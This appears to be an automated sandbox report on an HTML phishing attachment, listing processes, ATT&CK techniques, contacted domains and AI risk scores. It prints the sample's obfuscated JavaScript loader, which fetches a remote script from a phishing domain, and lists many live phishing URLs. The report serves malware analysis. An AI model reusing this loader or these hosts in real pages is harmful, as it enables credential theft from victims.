Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

HTTP Parser: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://ipinfo.io/	0%	URL Reputation	safe
https://cdn.socket.io/4.6.0/socket.io.min.js	0%	URL Reputation	safe
https://www.w3schools.com/w3css/4/w3.css	0%	URL Reputation	safe
file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	0%	Avira URL Cloud	safe
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	0%	Avira URL Cloud	safe
https://fiveradio-newbam.com/jsnom.js	100%	Avira URL Cloud	phishing
https://softwarereviews.s3.amazonaws.com/production/favicons/offerings/3117/original/Sharepoint_icon	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cs1100.wpc.omegacdn.net	152.199.23.37	true	false	unknown
d2vgu95hoyrpkh.cloudfront.net	52.85.49.85	true	false	unknown
cs837.wac.edgecastcdn.net	192.229.133.221	true	false	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
fiveradio-newbam.com	104.21.84.200	true	false	unknown
www.google.com	216.58.212.164	true	false	unknown
s-part-0039.t-0009.t-msedge.net	13.107.246.67	true	false	unknown
aadcdn.msftauth.net	unknown	unknown	false	unknown
www.w3schools.com	unknown	unknown	false	unknown
cdn.socket.io	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	true	Avira URL Cloud: safe	unknown
https://fiveradio-newbam.com/jsnom.js	false	Avira URL Cloud: phishing	unknown
https://ipinfo.io/	false	URL Reputation: safe	unknown
https://cdn.socket.io/4.6.0/socket.io.min.js	true	URL Reputation: safe	unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	false	Avira URL Cloud: safe	unknown
https://www.w3schools.com/w3css/4/w3.css	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://softwarereviews.s3.amazonaws.com/production/favicons/offerings/3117/original/Sharepoint_icon	chromecache_102.4.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.58.212.164	www.google.com	United States	15169	GOOGLEUS	false
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.67	s-part-0039.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
192.229.133.221	cs837.wac.edgecastcdn.net	United States	15133	EDGECASTUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.84.200	fiveradio-newbam.com	United States	13335	CLOUDFLARENETUS	false
52.85.49.85	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
152.199.23.37	cs1100.wpc.omegacdn.net	United States	15133	EDGECASTUS	false

Private

IP
192.168.2.7
192.168.2.9

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1448976
Start date and time:	2024-05-29 15:05:28 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html
Detection:	MAL
Classification:	mal84.phis.winHTML@30/33@12/10
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.185.227, 142.250.184.238, 74.125.206.84, 34.104.35.123, 142.250.185.99, 142.250.65.170, 142.251.40.170, 142.251.40.106, 142.250.80.10, 142.251.35.170, 142.250.65.202, 142.251.40.138, 142.250.65.234, 142.250.72.106, 142.250.64.74, 142.250.64.106, 142.251.40.234, 142.250.81.234, 172.217.165.138, 142.251.32.106, 142.251.41.10, 192.229.221.95, 142.250.185.131, 142.250.186.46
Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Input	Output
URL: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html Model: gpt-4o	```json { "riskscore": 8, "reasons": "The code uses 'document.write' with 'unescape' to inject a script element dynamically. This is a common technique used in malicious scripts to obfuscate the code and load external resources without the user's knowledge. The script sets various attributes including 'src' to an external URL, which could potentially load malicious content. Additionally, the use of 'document.addEventListener' to prevent default actions on context menus suggests an attempt to hinder user actions, which is suspicious behavior." }
document.write( unescape( '%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%73%63%72%69%70%74%22%29%3B%0A%20%20%20%20%20%20%20%20%73%63%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%73%72%63%22%2C%20%22%68%74%74%70%73%3A%2F%2F%63%64%6E%2E%73%6F%63%6B%65%74%2E%69%6F%2F%34%2E%36%2E%30%2F%73%6F%63%6B%65%74%2E%69%6F%2E%6D%69%6E%2E%6A%73%22%29%3B%0A%20%20%20%20%20%20%20%20%73%63%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%69%6E%74%65%67%72%69%74%79%22%2C%20%22%73%68%61%33%38%34%2D%63%37%39%47%4E%35%56%73%75%6E%5A%76%69%2B%51%2F%57%4F%62%67%6B%32%69%6E%30%43%62%5A%73%48%6E%6A%45%71%76%46%78%43%35%44%78%48%6E%39%6C%54%66%4E%63%65%32%57%57%36%68%32%70%48%36%75%2F%6B%46%2B%22%29%3B%0A%20%20%20%20%20%20%20%20%73%63%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%72%6F%73%73%6F%72%69%67%69%6E%22%2C%20%22%61%6E%6F%6E%79%6D%6F%75%73%22%29%3B%0A%20%20%20%20%20%20%20%20%73%63%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%74%79%70%65%22%2C%20%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%29%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%29%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%27%63%6F%6E%74%65%78%74%6D%65%6E%75%27%2C%20%65%76%65%6E%74%20%3D%3E%20%65%76%65%6E%74%2E%70%72%65%76%65%6E%74%44%65%66%61%75%6C%74%28%29%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%63%30%64%39%31%36%66%32%64%33%30%65%34%30%38%64%37%30%30%33%30%62%64%33%32%65%30%37%62%62%61%64%35%37%35%32%63%30%38%35%20%3D%20%61%74%6F%62%28%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%68%74%6D%6C%22%29%2E%67%65%74%41%74%74%72%69%62%75%74%65%28%22%70%6F%69%6E%74%22%29%29%3B%0A%20%20%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%73%63%30%64%39%31%36%66%32%64%33%30%65%34%30%38%64%37%30%30%33%30%62%64%33%32%65%30%37%62%62%61%64%35%37%35%32%63%30%38%35%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%65%39%38%34%32%38%63%64%32%61%64%32%66%37%33%34%32%35%64%30%36%34%66%35%37%37%30%66%36%30%38%39%31%64%34%35%66%61%30%39%5F%38%38%62%32%37%35%66%61%66%32%31%37%66%61%64%39%30%63%37%39%65%63%31%65%65%66%32%34%35%33%62%65%32%31%63%37%34%61%33%39%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%61%74%6F%62%28%22%63%32%4E%79%61%58%42%30%22%29%29%3B%0A%20%20%20%20%20%20%20%20%73%65%39%38%34%32%38%63%64%32%61%64%32%66%37%33%34%32%35%64%30%36%34%66%35%37%37%30%66%36%30%38%39%31%64%34%35%66%61%30%39%5F%38%38%62%32%37%35%66%61%66%32%31%37%66%61%64%39%30%63%37%39%65%63%31%65%65%66%32%34%35%33%62%65%32%31%63%37%34%61%33%39%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%61%74%6F%62%28%22%63%33%4A%6A%22%29%2C%20%73%63%30%64%39%31%36%66%32%64%33%30%65%34%30%38%64%37%30%30%33%30%62%64%33%32%65%30%37%62%62%61%64%35%37%35%32%63%30%38%35%20%2B%20%61%74%6F%62%28%22%4C%32%70%7A%62%6D%39%74%4C%6D%70%7A%22%29%29%3B%0A%20%20%20%20%20%20
URL: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html Model: gpt-4o	```json { "riskscore": 7, "reasons": "The code dynamically creates and appends script elements to the document head, which can be used to load external scripts. The use of 'atob' to decode base64 strings and the obfuscation of variable names increases the difficulty of understanding the code, which is a common technique in malicious scripts. Additionally, the prevention of the context menu could be an attempt to hinder user inspection. These factors combined suggest a higher risk of malicious intent." }
var sc = document.createElement("script"); sc.setAttribute("src", "https://cdn.socket.io/4.6.0/socket.io.min.js"); sc.setAttribute("integrity", "sha384-c79GN5VsunZvi+Q/WObgk2in0CbZsHnjEqvFxC5DxHn9lTfNce2WW6h2pH6u/kF+"); sc.setAttribute("crossorigin", "anonymous"); sc.setAttribute("type", "text/javascript"); document.head.appendChild(sc); document.addEventListener('contextmenu', event => event.preventDefault()); var sc0d916f2d30e408d70030bd32e07bbad5752c085 = atob(document.getElementById("html").getAttribute("point")); console.log(sc0d916f2d30e408d70030bd32e07bbad5752c085); var se98428cd2ad2f73425d064f5770f60891d45fa09_88b275faf217fad90c79ec1eef2453be21c74a39 = document.createElement(atob("c2NyaXB0")); se98428cd2ad2f73425d064f5770f60891d45fa09_88b275faf217fad90c79ec1eef2453be21c74a39.setAttribute(atob("c3Jj"), sc0d916f2d30e408d70030bd32e07bbad5752c085 + atob("L2pzbm9tLmpz")); se98428cd2ad2f73425d064f5770f60891d45fa09_88b275faf217fad90c79ec1eef2453be21c74a39.setAttribute(atob("dHlwZQ=="), atob("dGV4dC9qYXZhc2NyaXB0")); document.head.appendChild(se98428cd2ad2f73425d064f5770f60891d45fa09_88b275faf217fad90c79ec1eef2453be21c74a39);

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	https://link.sbstck.com/redirect/07cc7c38-01c9-45b4-adfb-583529674442?j=eyJ1IjoiM3l4NDRuIn0.hIfuke8RAzj-gbQmS59B61RAw2SA19eZRoxzpvNlDOU	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	Wave Browser.exe	Get hash	malicious	Unknown	Browse
	http://t.co/YMBMR6DEIY	Get hash	malicious	HTMLPhisher	Browse
	http://mansaduch.com	Get hash	malicious	Unknown	Browse
	http://purch.order.no/	Get hash	malicious	Unknown	Browse
	http://mari-dhl-box.com/roundcube/webmail/new-message-inbox/1-unread-message/sign-in/connexion/	Get hash	malicious	Unknown	Browse
	https://bellavistainnovaong.com/A1/2f3f/.btf/?w=depau@depau.com	Get hash	malicious	Unknown	Browse
	https://venmo.com/story/3666451449833989812?k=None	Get hash	malicious	Unknown	Browse
	http://keendk.com	Get hash	malicious	Unknown	Browse
	https://salekit.io/6655e351d2f1cbb48f024e42	Get hash	malicious	Unknown	Browse
13.107.246.45	Wave Browser.exe	Get hash	malicious	Unknown	Browse
	94411f0873e6410d644c8a630ffbdf387639fab05fbcda468a343ff3b5db246f_dump.bin.exe	Get hash	malicious	Ursnif	Browse
	https://hbsonlinecouk.atlassian.net/wiki/external/OTBhODE5Njg4ODY2NGIxZjk5NTUyOWZhNjRlMDI4YjE	Get hash	malicious	HTMLPhisher	Browse
	Arcadia Aerospace Industries (AAI) - ILSMart - RFQ4567987654.html	Get hash	malicious	Unknown	Browse
	https://www.yumpu.com/en/document/read/68712704/view-and-print-online-confidential-doc-98372-6-3-2	Get hash	malicious	HTMLPhisher	Browse
	RFQ Various models.xla.xlsx	Get hash	malicious	Unknown	Browse
	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse
	https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3D	Get hash	malicious	Unknown	Browse
	https://paypalgiftcardgenerator.pages.dev/	Get hash	malicious	Unknown	Browse
	https://sandnidenokvxzijas.theone-4.workers.dev/	Get hash	malicious	HTMLPhisher	Browse
13.107.246.67	94411f0873e6410d644c8a630ffbdf387639fab05fbcda468a343ff3b5db246f_dump.bin.exe	Get hash	malicious	Ursnif	Browse
	Arcadia Aerospace Industries (AAI) - ILSMart - RFQ4567987654.html	Get hash	malicious	Unknown	Browse
	https://www.yumpu.com/en/document/read/68712704/view-and-print-online-confidential-doc-98372-6-3-2	Get hash	malicious	HTMLPhisher	Browse
	undelivered messages.htm	Get hash	malicious	HTMLPhisher	Browse
	https://contactmonkey.com/api/v1/tracker?cm_session=6cb0d7b4-7514-49ed-a422-96811D97D405&cs=d01410f1-e93a-498a-bdf9-aed95ac45c9b&cm_type=link&cm_link=c38d4278-31b3-4240-b05e-868db3a168a7&cm_desusertion=https://contactmonkey.com/api/v1/tracker?cm_session=78cba606-2264-447f-bc39-96811D97D4c0&cs=825ad42b-2c78-40c6-8587-3b0541fc1564&cm_type=link&cm_link=0da11854-d710-40c4-8250-bcd92bcc7ee9&cm_desusertion=//neoparts%E3%80%82com.br/dayo/nayn/d3BvcHJhd2FAZXhldGVyZmluYW5jZS5jb20=$	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse
	Overview 2023.html	Get hash	malicious	Unknown	Browse
	https://ms-1drive.com/v/794850bf-f104-442e-acb0-475634834dda	Get hash	malicious	Unknown	Browse
	http://trq21files6468h65fdtr65g67h85deploy869.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	https://mariobadescu.tyb.xyz/	Get hash	malicious	Unknown	Browse
	https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
104.21.84.200	messages undelivered.htm_	Get hash	malicious	HTMLPhisher	Browse
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:eb3f4f83-6827-434b-9ee1-0182d3babf87	Get hash	malicious	HTMLPhisher	Browse
	REF# 5495941179-documentation 2032Pfile.msg	Get hash	malicious	HTMLPhisher	Browse
	Undelivered Messages.htm	Get hash	malicious	HTMLPhisher	Browse
	undelivered Messages - Copie.htm	Get hash	malicious	HTMLPhisher	Browse
192.229.133.221	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse
	undelivered messages.htm	Get hash	malicious	HTMLPhisher	Browse
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse
	https://ipfs.io/ipfs/bafkreigaatqmy2dep6ftrscv6trkpbmzbh4xy3oaecv4mhhl3rwhrsdpxy	Get hash	malicious	HTMLPhisher	Browse
	Re_ Bridge Drainage Enquiry.eml	Get hash	malicious	HTMLPhisher	Browse
	Re_ Enquiry.eml	Get hash	malicious	HTMLPhisher	Browse
	https://m.exactag.com/ai.aspx?tc=d9069973bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Aroyalweddingsktm.com%2Fimgs%2F37534%2Fsin3qp16kb%2FbWFyYy5zbWl0aEB6YmV0YS5jb20=	Get hash	malicious	HTMLPhisher	Browse
	https://ipfs.io/ipfs/bafkreiaifz4xo7tqmc7x3hbuqb4wsvlnyylklzgwnldgkszguv3ly2jdoy#YOUREMAIL	Get hash	malicious	Unknown	Browse
	https://linkpages.pro/P5zVPP	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cs837.wac.edgecastcdn.net	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	undelivered messages.htm	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	https://ipfs.io/ipfs/bafkreigaatqmy2dep6ftrscv6trkpbmzbh4xy3oaecv4mhhl3rwhrsdpxy	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	Re_ Bridge Drainage Enquiry.eml	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	Re_ Enquiry.eml	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	https://m.exactag.com/ai.aspx?tc=d9069973bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Aroyalweddingsktm.com%2Fimgs%2F37534%2Fsin3qp16kb%2FbWFyYy5zbWl0aEB6YmV0YS5jb20=	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	https://ipfs.io/ipfs/bafkreiaifz4xo7tqmc7x3hbuqb4wsvlnyylklzgwnldgkszguv3ly2jdoy#YOUREMAIL	Get hash	malicious	Unknown	Browse	192.229.133.221
	https://linkpages.pro/P5zVPP	Get hash	malicious	Unknown	Browse	192.229.133.221
d2vgu95hoyrpkh.cloudfront.net	https://ifewn.mpbolic.com/L6HiIOM/#Bfun@fun.com	Get hash	malicious	HTMLPhisher	Browse	18.245.31.33
	https://c9d8.pleincha.com/KLhe7Yn/	Get hash	malicious	HTMLPhisher	Browse	18.245.31.33
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	13.227.219.47
	undelivered messages.htm	Get hash	malicious	HTMLPhisher	Browse	143.204.194.96
	https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3D	Get hash	malicious	HTMLPhisher	Browse	18.245.31.78
	ELECTRONIC RECEIPT_Jlohr.html	Get hash	malicious	HTMLPhisher	Browse	18.245.31.5
